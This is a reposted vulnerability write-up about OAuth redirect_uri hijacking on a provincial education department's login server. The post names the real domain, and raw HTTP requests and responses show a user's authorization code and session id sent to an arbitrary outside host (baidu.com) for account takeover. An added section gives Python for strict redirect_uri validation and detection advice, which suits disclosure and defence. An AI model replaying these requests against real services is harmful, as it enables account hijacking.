Vulnerability hunting: redirect_uri authorization hijacking at a provincial education department (crowd-testing vendor)

2019-04-10 · about 736 words · estimated reading time 2 minutes

Notice: this article, "Vulnerability hunting: redirect_uri authorization hijacking at a provincial education department (crowd-testing vendor)", was first published by phpoop on 先知社区 (Xianzhi community) on 2019-04-10 09:45:00 and had been viewed 18 times.

Thanks to phpoop for the hard work!

0x01 Overview

Sloppy redaction brings your family to tears.
The real domain has been changed to: duijie.zjer.cn

Note: `domain.com` in the requests and responses below stands for the redacted target host.

Vulnerable URL: http://domain.com:8087/oauthserver/?client_id=7D4A4A2C4B701548F97FA88C379447BA&state=1&response_type=code&redirect_uri=http://baidu.com

The redirect_uri parameter is not validated at all, so the authorization server delivers the user's code/token to whatever URL the request supplies.

0x02 Request packets

0x02.1 Request 1:

Request:

POST http://domain.com:8087/oauthserver/loginAction.action HTTP/1.1
Host: domain.com:8087
Connection: keep-alive
Content-Length: 196
Cache-Control: max-age=0
Origin: http://domain.com:8087
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://domain.com:8087/oauthserver/?client_id=7D4A4A2C4B701548F97FA88C379447BA&state=1&response_type=code&redirect_uri=http://baidu.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: cookie不能给你哦~

user.redirect_uri=http%3A%2F%2Fbaidu.com&user.response_type=&user.client_id=7D4A4A2C4B701548F97FA88C379447BA&user.state=&user.scope=&user.resource_url=&user.account=tsetaaaa&user.password=tsetaaaa

Response:

HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2006E057AE8523895F2DB0F85A84E321; Path=/oauthserver; Secure; HttpOnly
Location: http://baidu.com?clientid=7D4A4A2C4B701548F97FA88C379447BA&oauthCode=9b2fc7458c4a75c45e1942cc838d9c97&code=9b2fc7458c4a75c45e1942cc838d9c97&usessionid=093c8b66-cbc6-47b0-8733-f4a200b593db&account=tsetaaaa
Content-Length: 0
Date: Tue, 19 Mar 2019 08:56:42 GMT

0x02.2 Request 2:

Request:

GET http://baidu.com/?clientid=7D4A4A2C4B701548F97FA88C379447BA&oauthCode=9b2fc7458c4a75c45e1942cc838d9c97&code=9b2fc7458c4a75c45e1942cc838d9c97&usessionid=093c8b66-cbc6-47b0-8733-f4a200b593db&account=tsetaaaa HTTP/1.1
Host: baidu.com
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://domain.com:8087/oauthserver/?client_id=7D4A4A2C4B701548F97FA88C379447BA&state=1&response_type=code&redirect_uri=http://baidu.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: cookie不能给你哦~

Response:

HTTP/1.1 302 Moved Temporarily
Server: bfe/1.0.8.18
Date: Tue, 19 Mar 2019 08:56:43 GMT
Content-Type: text/html
Content-Length: 161
Connection: Keep-Alive
Location: https://www.baidu.com/?clientid=7D4A4A2C4B701548F97FA88C379447BA&oauthCode=9b2fc7458c4a75c45e1942cc838d9c97&code=9b2fc7458c4a75c45e1942cc838d9c97&usessionid=093c8b66-cbc6-47b0-8733-f4a200b593db&account=tsetaaaa
Expires: Wed, 20 Mar 2019 08:56:43 GMT
Cache-Control: max-age=86400
Cache-Control: privae

<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>bfe/1.0.8.18</center>
</body>
</html>

User login token (delivered to the attacker-controlled redirect target): https://www.baidu.com/?clientid=7D4A4A2C4B701548F97FA88C379447BA&oauthCode=9b2fc7458c4a75c45e1942cc838d9c97&code=9b2fc7458c4a75c45e1942cc838d9c97&usessionid=093c8b66-cbc6-47b0-8733-f4a200b593db&account=tsetaaaa

This token can then be used to log in as the user.
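The root cause in the overview is that `/oauthserver/` never compares redirect_uri against anything the client registered. The fix prescribed by RFC 6749 section 3.1.2.3 and the OAuth 2.0 Security Best Current Practice is exact string matching against a pre-registered redirect URI, decided before the authorization code is issued. The following Python is an added example of that check, not code from the write-up or from the affected service; the registered callback URL (`https://portal.example.edu/oauth/callback`) and the code value are constructed placeholders, while the client_id and the `http://baidu.com` redirect are the values shown above.

```python
"""Strict redirect_uri validation for an OAuth 2.0 authorization server.

Added example: shows the unvalidated redirect from the write-up next to an
exact-match check that refuses to hand the code to an unregistered URI.
"""
from urllib.parse import urlencode, urlsplit

# Constructed client registration. The client_id is the one from the write-up;
# the callback URL is a hypothetical placeholder, not the real service.
REGISTERED_REDIRECT_URIS = {
    "7D4A4A2C4B701548F97FA88C379447BA": frozenset({
        "https://portal.example.edu/oauth/callback",
    }),
}


def is_allowed_redirect_uri(client_id: str, redirect_uri: str) -> bool:
    """Exact-match redirect_uri against the client's registered URIs.

    Deliberately no prefix, substring or host-suffix comparison: those
    shortcuts are what turn a registered URI back into an open redirector.
    Case, default ports and trailing slashes all count as differences.
    """
    allowed = REGISTERED_REDIRECT_URIS.get(client_id)
    if not allowed:
        return False  # unknown client: refuse rather than guess
    parts = urlsplit(redirect_uri)
    if not parts.scheme or not parts.netloc or parts.fragment:
        return False  # must be an absolute URI and must not carry a fragment
    return redirect_uri in allowed


def build_redirect_location(client_id: str, redirect_uri: str,
                            code: str, state: str) -> str:
    """Return the Location header for the 302 that delivers the code.

    Raises ValueError instead of redirecting when redirect_uri is not
    registered, so the authorization code never leaves the server.
    """
    if not is_allowed_redirect_uri(client_id, redirect_uri):
        raise ValueError("redirect_uri does not match client registration")
    sep = "&" if urlsplit(redirect_uri).query else "?"
    return redirect_uri + sep + urlencode({"code": code, "state": state})


def vulnerable_redirect_location(redirect_uri: str, code: str) -> str:
    """The behaviour observed in the write-up: redirect wherever the request says."""
    return redirect_uri + "?" + urlencode({"code": code})


if __name__ == "__main__":
    cid = "7D4A4A2C4B701548F97FA88C379447BA"
    attacker_uri = "http://baidu.com"  # redirect_uri used in the write-up
    good_uri = "https://portal.example.edu/oauth/callback"
    code = "CONSTRUCTED_CODE_VALUE"  # placeholder, not a real code
    print("vulnerable:", vulnerable_redirect_location(attacker_uri, code))
    print("hardened  :", build_redirect_location(cid, good_uri, code, "1"))
    try:
        build_redirect_location(cid, attacker_uri, code, "1")
    except ValueError as exc:
        print("rejected  :", exc)
```

The hardened path also returns the `state` value the client sent, which the write-up's server dropped from its Location header; echoing it lets the client bind the callback to the session that started the flow. On the detection side, an authorization server that logs every rejected redirect_uri alongside the client_id gives defenders a direct signal of probing against this endpoint.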



Author

旭达网络

旭达网络 technical blog, recording all kinds of technical problems, each solved in a single post.
This article is licensed under the Creative Commons Attribution 4.0 International License.
